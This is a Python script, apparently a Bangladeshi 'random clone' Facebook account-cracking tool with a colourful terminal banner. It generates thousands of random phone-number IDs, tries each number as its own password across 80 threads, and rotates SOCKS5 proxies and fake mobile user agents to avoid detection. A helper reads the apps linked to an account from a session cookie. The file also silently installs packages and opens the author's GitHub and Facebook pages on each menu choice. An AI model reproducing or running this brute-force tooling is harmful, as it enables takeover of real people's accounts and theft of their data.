#created by HASAN
#!/usr/bin/python3
#---------------------[IMPORT]---------------------#
from bs4 import BeautifulSoup as sop
from concurrent.futures import ThreadPoolExecutor as tred
import os,sys,time,json,random,re,string,platform,base64,platform,uuid
import requests,random,sys,json,os,re
from time import sleep
from os import system
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,uuid,ipaddress,calendar,requests,mechanize,bs4,sys,os,subprocess,uuid,requests,sys,random,time,re,base64,json,platform
from datetime import date
from datetime import datetime
from time import sleep
from time import sleep as waktu
from random import random as acak
from random import choice as pilih
from random import randint
from bs4 import BeautifulSoup
import requests as ress
from sys import exit as exit
class jalan:
    def __init__(self, z):
        for e in z + "\n":
            sys.stdout.write(e)
            sys.stdout.flush()
            time.sleep(0.009)

###----------[ IMPORT LIBRARY ]---------- ###
import requests
import bs4
import sys
import os
import random
import time
import re
import json
import uuid
import subprocess
import marshal
import rich
import shutil
import webbrowser
from random import randint
from concurrent.futures import ThreadPoolExecutor as ThreadPool
from bs4 import BeautifulSoup as par
from datetime import date
from datetime import datetime
# from rich import print as printer
from datetime import date
import marshal
try:
    import requests
    from concurrent.futures import ThreadPoolExecutor as ThreadPool
    import mechanize
    from requests.exceptions import ConnectionError
except ModuleNotFoundError:
    os.system('pip install mechanize requests futures==2 > /dev/null')
    os.system('python  S-CLONE.py')
from bs4 import BeautifulSoup
from datetime import date
from datetime import datetime
from time import sleep
from time import sleep as waktu
ugen = []
sir = '\033[41m\x1b[1;97m'
x = '\33[m' # DEFAULT
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m'    # WARNA MATI
A = '\x1b[1;90m' # WARNA ABU ABU
BN = '\x1b[1;107m' # BELAKANG PUTIH
BBL = '\x1b[1;106m' # BELAKANG BIRU LANGIT
BP = '\x1b[1;105m' # BELAKANG PINK
BB = '\x1b[1;104m' # BELAKANG BIRU
BK = '\x1b[1;103m' # BELAKANG KUNING
BH = '\x1b[1;102m' # BELAKANG HIJAU
BM = '\x1b[1;101m' # BELAJANG MERAH
BA = '\x1b[1;100m' # BELAKANG ABU ABU
A = '\x1b[1;97m' 
#B = '\x1b[1;96m' 
BLACK = '\x1b[1;90m' 
C = '\x1b[1;91m' 
D = '\x1b[1;92m'
M = '\033[1;31m'
H = '\033[1;32m'
N = '\x1b[1;37m'    
E = '\x1b[1;93m' 
F = '\x1b[1;94m'
G = '\x1b[1;95m'
P = '\033[1;37m'


#
WW = '\033[97;1m' 
RR = '\033[91;1m' 
GG = '\033[92;1m' 
YY = '\033[93;1m' 
BB = '\033[94;1m'
PP = '\033[95;1m'
CC = '\033[96;1m'
NN = '\x1b[0m'
#

RED = '\033[1;91m'
WHITE = '\033[1;97m'
GREEN = '\033[1;32m' #
YELLOW = '\033[1;33m'
BLUE = '\033[1;34m'
ORANGE = '\033[1;35m'
HBF = '{ HBF }'
my_color = [
 P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
today = date.today()
#HASAN2 = "\033[1;33m➤\033[1;32m➤\x1b[0m"
url_lookup = "https://lookup-id.com/"

url_mb = "https://mbasic.facebook.com"

url_ip = "https://www.httpbin.org/ip"

url_graph = "https://graph.facebook.com/{}"

header_grup = {"user-agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/50.0.125 Chrome/44.0.2403.125 Safari/537.36[FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"}

bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}

#agen1 = ['NokiaC2-00/2.0 (03.45) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Java; U; kau; nokiac2-00) UCBrowser8.3.0.154/70/352/UCWEB Mobile']

#agen2 = ['NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+']

###########################################################################################

hhhh, iiii, jjjj, kkkk = "index.php?", "next=https%3A%2F%2Fdevelopers.facebook.com", "%2Ftools%2Fdebug", "%2Faccesstoken%2F"

dddd, eeee, ffff, gggg = "login", "device-based", "validate-password", "?shbl=0"

aaaa, bbbb, cccc = "tools", "debug", "accesstoken"

#bahasa = "en-GB,en-US;q=0.9,en;q=0.8"

bahasa = "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"

#bahasa = "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,id;q=0.6,bs;q=0.5"

###########################################################################################

## RANDOM UA

#user_agent=['Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.45 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/345.0.0.34.118;]','Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36']

uas_bawaan = "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"

uas_nokiac2 = "NokiaC1-01/2.0 (06.15) Profile/MIDP-2.1 Configuration/CLDC-1.1 UCWEB/2.0 (Java; U; MIDP-2.0; en-US; nokiac1-01) U2/1.0.0 UCBrowser/8.9.0.251 U2/1.0.0 Mobile UNTRUSTED/1.0"

uas_nokiax20 = "NokiaX2-00/5.0 (08.25) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-X906B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36 UNTRUSTED/1.0"

uas_nokiax = "Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 NokiaBrowser/1.2.0.11"

uas_samsungse = "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G950F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.4 Chrome/59.0.3071.125 Mobile Safari/537.36"

uas_oppoA31 = "Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; A31 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.114 Mobile Safari/537.36 OppoBrowser/3.9.2"

uas_nokiaxl = "Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/012.002; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.0 Mobile Safari/533.4 3gpp-gba"

#uas_chromelinux = "Mozilla/5.0 (Linux; Android 11; SM-A105FN Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/107.0.5304.141 Mobile Safari/537.36 GNews Android/2022102450"

#uas_j7prime = "Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G610F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36"

uas_tes = "Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4X Build/MiUI MS; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 Instagram 38.0.0.13.95 Android (24/7.0; 480dpi; 1080x1920; Xiaomi/xiaomi; Redmi Note 4X; mido; qcom; ru_RU; 99640911)"

uas_random = random.choice(["Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+","Mozilla/5.0 (Linux; Android 10; Nokia 5.1 Plus Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"])

uas_nokiac3 = "NokiaX2-01/5.0 (07.10) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"

uas_iphone = "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBDV/iPhone9,1;FBMD/iPhone;FBSN/iOS;FBSV/12.3.1;FBSS/2;FBCR/Verizon;FBID/phone;FBLC/en_US;FBOP/5]"

uas_nokia5plus = "Mozilla/5.0 (Linux; Android 9; Nokia 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36"

uas_random2 = random.choice(["Mozilla/5.0 (Linux; Android 9; SM-A605FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.1.2; Redmi 5 Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 8.0.0; WAS-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.1.2; Redmi Note 5A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 9; BND-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 8.0.0; SM-J337P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-N960F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 9; Mi A3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36","Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.25 (Edition Campaign 67)","Opera/9.80 (Windows NT 5.0; MRA 6.0 (build 5711)) Presto/2.12.388 Version/12.11"])
# lempankkkkkkkk

ugen2=[]

ugen=[]

try:
    prox= requests.get('https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks5&timeout=100000&country=all&ssl=all&anonymity=all').text
    open('.prox.txt','w').write(prox)
except Exception as e:
    print('\x1b[1;92m[<\>]\x1b[1;97m \x1b[1;96mHASAN')
prox=open('.prox.txt','r').read().splitlines()


for xd in range(10000):
    a='Mozilla/5.0 (Symbian/3; Series60/'
    b=random.randrange(1, 9)
    c=random.randrange(1, 9)
    d='Nokia'
    e=random.randrange(100, 9999)
    f='/110.021.0028; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/'
    g=random.randrange(1, 9)
    h=random.randrange(1, 4)
    i=random.randrange(1, 4)
    j=random.randrange(1, 4)
    k='Mobile Safari/535.1'
    uaku=(f'{a}{b}.{c} {d}{e}{f}{g}.{h}.{i}.{j} {k}')
    ugen2.append(uaku)


    aa='Mozilla/5.0 (Linux; U; Android'
    b=random.choice(['4','5','6','7','8','9','10','11','12'])
    c=' en-us; GT-'
    d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    e=random.randrange(1, 999)
    f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
    h=random.randrange(73,100)
    i='0'
    j=random.randrange(4200,4900)
    k=random.randrange(40,150)
    l='Mobile Safari/537.36'
    uaku2=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
    ugen.append(uaku2)

    
    
for x in range(10):
    a='Mozilla/5.0 (SAMSUNG; SAMSUNG-GT-S'
    b=random.randrange(100, 9999)
    c=random.randrange(100, 9999)
    d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    e=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    g=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    h=random.randrange(1, 9)
    i='; U; Bada/1.2; en-us) AppleWebKit/533.1 (KHTML, like Gecko) Dolfin/'
    j=random.randrange(1, 9)
    k=random.randrange(1, 9)
    l='Mobile WVGA SMM-MMS/1.2.0 OPN-B'
    uak=f'{a}{b}/{c}{d}{e}{f}{g}{h}{i}{j}.{k} {l}'
    ##USER AGENT START##
    
    
    ##
def uaku():
    try:
        ff=open('show.txt','r').read().splitlines()
        for ub in ff:
            ugen.append(ub)
    except:
        a=requests.get('https://raw.githubusercontent.com/Dark-Cyber-07/BLACK_XXX/main/show.txt').text
        ff=open('show.txt','w')
        aa=re.findall('line">(.*?)<',str(a))
        for un in aa:
            ff.write(un+'\n')
        ff=open('show.txt','r').read().splitlines()
def jalan(z):

    for e in z + '\n':

        sys.stdout.write(e)

        sys.stdout.flush()

        time.sleep(0.03)
        
        
        
def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)

fuckx=str(input("\033[1;93mENTER YOUR USER NAME : "))
os.system('xdg-open https://github.com/KgHasan')
name=fuckx.upper()

psb('\x1b[1;31mBANGLADESH HASAN VAI CLONING START PLEASE WAIT ..........')
time.sleep(3)




loop = 0
cp = []
ok = []
uid = []

def clear():
    os.system('clear')
from time import localtime as lt
from os import system as cmd
ltx = int(lt()[3])
if ltx > 12:
    a = ltx-12
    tag = "PM"
else:
    a = ltx
    tag = "AM"
def banner():
    clear()
    print(f"""\033[1;92m
   \033[1;91m██╗  ██╗ \033[1;92m █████╗  \033[1;94m███████╗ \033[1;95m █████╗  \033[1;96m███╗   ██╗
   \033[1;91m██║  ██║ \033[1;92m██╔══██╗ \033[1;94m██╔════╝ \033[1;95m██╔══██╗ \033[1;96m████╗  ██║
   \033[1;91m███████║ \033[1;92m███████║ \033[1;94m███████╗ \033[1;95m███████║ \033[1;96m██╔██╗ ██║
   \033[1;91m██╔══██║ \033[1;92m██╔══██║ \033[1;94m╚════██║ \033[1;95m██╔══██║ \033[1;96m██║╚██╗██║
   \033[1;91m██║  ██║ \033[1;92m██║  ██║ \033[1;94m███████║ \033[1;95m██║  ██║ \033[1;96m██║ ╚████║
   \033[1;91m╚═╝  ╚═╝ \033[1;92m╚═╝  ╚═╝ \033[1;94m╚══════╝ \033[1;95m╚═╝  ╚═╝ \033[1;96m╚═╝  ╚═══╝
         
  \033[1;92m×××××××××××××××××\033[1;93m××××××××××××××\033[1;92m××××××××××××××××××
  \033[1;32m|     \033[1;33m[✓] CREATED BY\33[0;m   :  \033[1;33mASRAFUL ISLAM HASAN   \033[1;92m|
  \033[1;32m|     \033[1;32m[✓] FACEBOK      : \033[1;34m Hasa N                \033[1;92m|
  \033[1;32m|     \033[1;35m[✓] GITHUB       :  \033[1;35mKgHasan               \033[1;92m|
  \033[1;32m|     \033[1;36m[✓] TOOL STATUS  :  \033[1;36mRandom Clone          \033[1;92m|
  \033[1;32m|     \033[1;35m[✓] TEAM         :  \033[1;35mKST                   \033[1;92m|
  \033[1;32m|     \033[1;36m[✓] TOOL VIRSION :  \033[1;36m2.4                   \033[1;92m|
  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××{P}""")


    

    
#---------------------[LOOP MENU]---------------------#
loop = 0
ok = []
uid = []

#MY TOOLS SECURITY ##



#---------------------[APPLICATION CHECKER]---------------------#
def cek_apk(session,coki):
    w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":coki}).text
    sop = BeautifulSoup(w,"html.parser")
    x = sop.find("form",method="post")
    game = [i.text for i in x.find_all("h3")]
    if len(game)==0:
        print(f'    %s{P}[%s×%s] %sSorry there is no Active  Apk%s         '%(N,M,N,B,N))
    else:
        print(f'    [🎮] %s ☆ Your Active Apps ☆     :{B}'%(GREEN))
        for i in range(len(game)):
            print(f"    [%s%s] {H}%s %s"%(N,i+1,game[i].replace("Ditambahkan pada"," Ditambahkan pada"),N))
        #else:
            #print(f'\r %s[%s!%s] Sorry, Apk check failed invalid cookie'%(N,M,N))
    w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies={"cookie":coki}).text
    sop = BeautifulSoup(w,"html.parser")
    x = sop.find("form",method="post")
    game = [i.text for i in x.find_all("h3")]
    if len(game)==0:
        print(f'    %s[%s!%s] %sSorry there is no Expired Apk%s                \n'%(N,B,N,M,N))
    else:
        print(f'    [✔] %s ☑ Your Expired Apps ☑    :\033[1;92m'%(M))
        for i in range(len(game)):
            print(f"    [%s%s] %s %s"%(N,i+1,game[i].replace("Kedaluwarsa"," Kedaluwarsa"),N))
        else:
            print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))


#---------------------[MAIN MENU]---------------------#



#---------------------[MAIN CLONING DEF 2]---------------------#
def main():
    os.system('clear')
    banner()
    print(f' ')
    print(f'\033[1;92m  ✓\033[1;93m===> [•] TOOL NAME : \033[1;93mHASAN VAI')
    print(f'\033[1;92m  ✓\033[1;93m===> [•] YOR IP    : \033[1;91mNoT Sapport Bro..')
    print(f'\033[1;92m  ✓\033[1;93m===> [•] VERSION   : \033[1;96m1.0.9')
    print(f'\033[1;92m  ✓\033[1;93m===> [•] TOOL NAME : \033[1;93mHASAN VAI RANDOM\n')
    
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}1{H}] \033[1;92mRANDOM BD 06 DIGIT ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}2{H}] \033[1;92mRANDOM BD 07 DIGIT ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}3{H}] \033[1;92mRANDOM BD 08 DIGIT ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}4{H}] \033[1;92mRANDOM BD 09 DIGIT ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}5{H}] \033[1;92mRANDOM BD 10 DIGIT ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}6{H}] \033[1;92mRANDOM BD 11 DIGIT \033[1;96m(BEST) ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}7{H}] \033[1;92mRANDOM BD 12 DIGIT ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}8{H}] \033[1;92mRANDOM BD 13 DIGIT ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}9{H}] \033[1;92mRANDOM BD 14 DIGIT ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}F{H}] \033[1;92mFOLLOWING ME ON GITHUB")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}Y{H}] \033[1;92mFOLLOWING ME ON FB ")
    print(f"\033[1;92m  ✓\033[1;93m===>{H}[{M}U{H}] \033[1;92mUPDATE PROGRAMME ")
    sh = input(" \033[1;92m ✓\033[1;93m===>\033[1;92m[\033[1;91m#\033[1;92m]\033[1;91m CHOOSE : ")
    if sh =='1':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       sh6()
    if sh =='2':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       sh7()
    if sh =='3':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       sh8()
    if sh =='4':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       sh9()
    if sh =='5':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       sh10()
    if sh =='6':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       sh11()
    if sh =='7':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       sh12()
    if sh =='8':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       sh13()
    if sh =='9':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       sh14()
    if sh =='F':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       main()
    if sh =='y':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       main()
    if sh =='U':
       os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
       main()
    elif sh =='00':
        os.system('xdg-open https://www.facebook.com/copy.link.erorr404')
    else:
        os.system('xdg-open https://github.com/KgHasan')
        main()
        






def sh11():
    user=[]
    
    os.getuid
    os.geteuid
    clear()
    banner()
    print(f"                 {H} 11 DIGIT {K}CRACK{P} [{H}⚜{P}] ");time.sleep(0.05)
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print(f'   \033[1;92m BD CODE: {P}[{H}016{P}][{B}017{P}][{K}019{P}][{K}018{P}][{P}013{P}][{K}014{P}]')
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print("")
#    print(f"          \x1b[97m[\033[37;41m  C O D E    M E N U   \033[0;m]")
  #  print(f"")
#    linex()
 #   print(f"        \x1b[97m[\033[95;42mEXAMPLE :👇\033[0;m]")
  #  print(f"")
   # print(' 880171 , 880172 , 880173 \n 880174 , 880191 , 880192\n 880193 , 880194 , 880181\n 880182 , 880183 , 880184\n 880161 , 880162 , 880163 ')
 #   print(f"")
  #  linex()
    code = input(f' CHOOSE :{H} ')
    os.system("clear")
    banner()
    print(f"")
    print(f'    {P}[{H}√{P}] EXAMPLE    : {K}5000/10000/20000')
    print(f"")
    limit = int(input(f'    %s[%s?%s] CRACK ID LIMIT : %s'%(N,K,N,H)))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(8))
        user.append(nmp)
    with ThreadPool(max_workers=80) as manshera:    
        clear()
        banner()
        tl = str(len(user))
       # print(f'  {H}    {P}FREE MOD          : {H}ON        {H}  ')
       # print(f'    {H}  {B}SIM CODE {K}ID       : {H}%s           {H}  '%(name))
       # print(f'    {H}  {B}SIM CODE {K}ID       : {H}%s           {H}  '%(code))
       # print(f'  {H}    {M}TOTAL CRACK HASAN ID :{H} %s          {H}     '%(tl))
       # print(f'  {H}    {K}THE PROCESS HAS BEEN STARTED         {H}  ')
        #print(f'  {H}    {U}USE FLIGHT (\033[1;94mAIRPLANE\033[1;97m) MODE BEFORE USE {H} ')
       # print(f'  {M}  ╚════════════════════════════════════════╝ {P}')
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        print(f"{P}[{H}•{P}]  \033[1;92mWElCOME  MY TOOLS     : \033[1;92m"+name)
        print(f"{P}[{H}•{P}]  \033[1;92mTOTAL IDZ             : \033[1;92m"+tl)
        print(f"{P}[{H}•{P}]  \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        print(f"{P}[{H}•{P}]  \033[1;92mNUMBER YOU PUT        : {RED}"+code)
        print(f"{P}[{H}•{P}]  \033[1;92mPROCESS HAS BEEN STARTED")
        print(f"{P}[{H}•{P}]  \033[1;92mBE PATIENT.......")
        print(f"{P}[{H}•{P}]  \033[1;92mTO STOP PROCESS Ctrl + Z ")
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        for love in user:
            uid = code+love
            pwx = [code+love]
            manshera.submit(m,uid,pwx,tl)
    sh = input(f'\n\n    {M}Go TO MAIN MENU [ Y/N] :{H}  ')
    if sh =='y':
        check_update()
    elif sh =='Y':
        check_update()
    else:
        check_update()
    
    
def sh9():
    user=[]
    
    os.getuid
    os.geteuid
    clear()
    banner()
    print(f"                 {H} 9 DIGIT {K}CRACK{P} [{H}⚜{P}] ");time.sleep(0.05)
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print(f'   \033[1;92m BD CODE: {P}[{H}016{P}][{B}017{P}][{K}019{P}][{K}018{P}][{P}013{P}][{K}014{P}]')
    print("    %s═════════════════════%s═════════════════════%s"%(M,H,P))
    print("")
#    print(f"          \x1b[97m[\033[37;41m  C O D E    M E N U   \033[0;m]")
  #  print(f"")
#    linex()
 #   print(f"        \x1b[97m[\033[95;42mEXAMPLE :👇\033[0;m]")
  #  print(f"")
   # print(' 880171 , 880172 , 880173 \n 880174 , 880191 , 880192\n 880193 , 880194 , 880181\n 880182 , 880183 , 880184\n 880161 , 880162 , 880163 ')
 #   print(f"")
  #  linex()
    code = input(f' CHOOSE :{H} ')
    os.system("clear")
    banner()
    print(f"")
    print(f'    {P}[{H}√{P}] EXAMPLE    : {K}5000/10000/20000')
    print(f"")
    limit = int(input(f'    %s[%s?%s] CRACK ID LIMIT : %s'%(N,K,N,H)))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(8))
        user.append(nmp)
    with ThreadPool(max_workers=80) as manshera:    
        clear()
        banner()
        tl = str(len(user))
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
        print(f"{P}[{H}•{P}]  \033[1;92mWElCOME  MY TOOLS     : \033[1;92m"+name)
        print(f"{P}[{H}•{P}]  \033[1;92mTOTAL IDZ             : \033[1;92m"+tl)
        print(f"{P}[{H}•{P}]  \033[1;92mCOUNTRY YOU CHOOSE    : \033[1;92mBANGL\033[1;91mADESH 🇧🇩")
        print(f"{P}[{H}•{P}]  \033[1;92mNUMBER YOU PUT        : {RED}"+code)
        print(f"{P}[{H}•{P}]  \033[1;92mPROCESS HAS BEEN STARTED")
        print(f"{P}[{H}•{P}]  \033[1;92mBE PATIENT.......")
        print(f"{P}[{H}•{P}]  \033[1;92mTO STOP PROCESS Ctrl + Z ")
        print(f'  \033[1;92m×××××××××××××××××\033[1;93m×××××××××××××××\033[1;92m×××××××××××××××××')
